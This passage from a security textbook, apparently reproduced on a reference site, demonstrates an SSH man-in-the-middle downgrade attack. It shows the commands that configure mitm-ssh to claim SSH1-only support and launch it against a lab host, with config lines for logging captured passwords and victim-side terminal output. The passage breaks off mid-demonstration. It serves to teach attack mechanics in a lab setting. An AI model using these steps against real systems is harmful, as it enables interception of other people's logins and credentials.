Graphics Programs Reference
In-Depth Information
be asked to add the new fingerprint. The mitm-sshtool uses a configuration
file similar to openssh's, since it's built from that code. By adding the line
Protocol 1
to /usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will
claim it only speaks the SSH1 protocol.
The output below shows that loki's SSH server usually speaks using both
SSH1 and SSH2 protocols, but when mitm-ssh is put in the middle using the
new configuration file, the fake server claims it only speaks SSH1 protocol.
From 192.168.42.250 (tetsuo), Just an Innocent Machine on the Network
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9p1
Connection closed by foreign host.
iz@tetsuo:~ $ rm ~/.ssh/known_hosts
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password:
iz@tetsuo:~ $
On the Attacker's Machine, Setting Up mitm-ssh to Only Use SSH1 Protocol
reader@hacking:~ $ echo "Protocol 1" >> /usr/local/etc/mitm-ssh_config
reader@hacking:~ $ tail /usr/local/etc/mitm-ssh_config
# Where to store passwords
#PasswdLogFile /var/log/mitm-ssh/passwd.log
# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh
# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh
Protocol 1
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
R
SA key generation complete.
Now Back on 192.168.42.250 (tetsuo)
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
